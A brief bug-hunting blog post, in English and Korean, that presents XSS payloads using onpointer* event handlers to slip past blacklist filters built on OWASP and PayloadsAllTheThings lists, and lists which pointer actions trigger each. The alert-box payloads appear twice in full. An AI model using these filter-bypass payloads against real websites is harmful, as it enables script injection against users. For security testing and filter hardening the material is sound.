onpoint* XSS Payload for bypass blacklist base event-handler xss filter

by hahwul 1 min read

Hi hackers. I crafted XSS payloads for bypass event handler protection. it is just simple code.

onpoint* is an event handler for pointing devices (such as tablets). It has actions similar to onmouse*, and it can be used for XSS protection bypass.

onpoint* 로 시작하는 이벤트 핸들러가 있는데, 동작 방식이 onmouse*와 비슷하며 테스트 하다보니 이를 이용해서 XSS가 가능하여 블로그 글로 작성해봅니다. (TLDR만 봐도 무방..)

<div onpointerover="alert(45)">this is onpointerover=alert(45)</div>

TL;DR (XSS Payloads)

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

What is onpointer* ?

onpointer* is event handler for pointing devices.

https://www.w3.org/TR/pointerevents/

원래는 마우스 같은 포인팅 도구를 위한 핸들러로 알고있습니다(요게 조금 애매하긴한데..) 아무튼 사실상 포인팅 도구 또한 마우스와 어느정도 동일하다고 볼 수 있어서 트리거 하는 방식은 거의 비슷합니다. 포인터가 위에있을 때, 지나갔을 때, 움직였을 때 등등 이런 포인팅 이벤트가 발생했을 때 받아줄 수 있는 핸들러에요. 자세한 내용은 위에 링크 참고해주세요.

Event Handler of pointer

  • onpointercancel
  • onpointerdown
  • onpointerenter
  • onpointerleave
  • onpointermove
  • onpointerout
  • onpointerover
  • onpointerup
  • gotpointercapture
  • lostpointercapture

onpoint* testing for xss

onpointerover => run mouseover

onpointerdown => run click

onpointerenter => run mouseover

onpointerleave => run mouseleave

onpointermove => run mouseleave

onpointerout => run mouseover

onpointerup => run mouseover

Valid Payload..

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

Conclusion

Blacklist filtering based on the this(owasp,payloadallthethings) document can be bypassed because OWASP, Payload all the things, does not have this content.

Since HTML5, there are really many different event handlers and tags. A lot of testing is needed.

It’s a simple trick, but hope it helps! happy bug hunting and security engineering.

Reference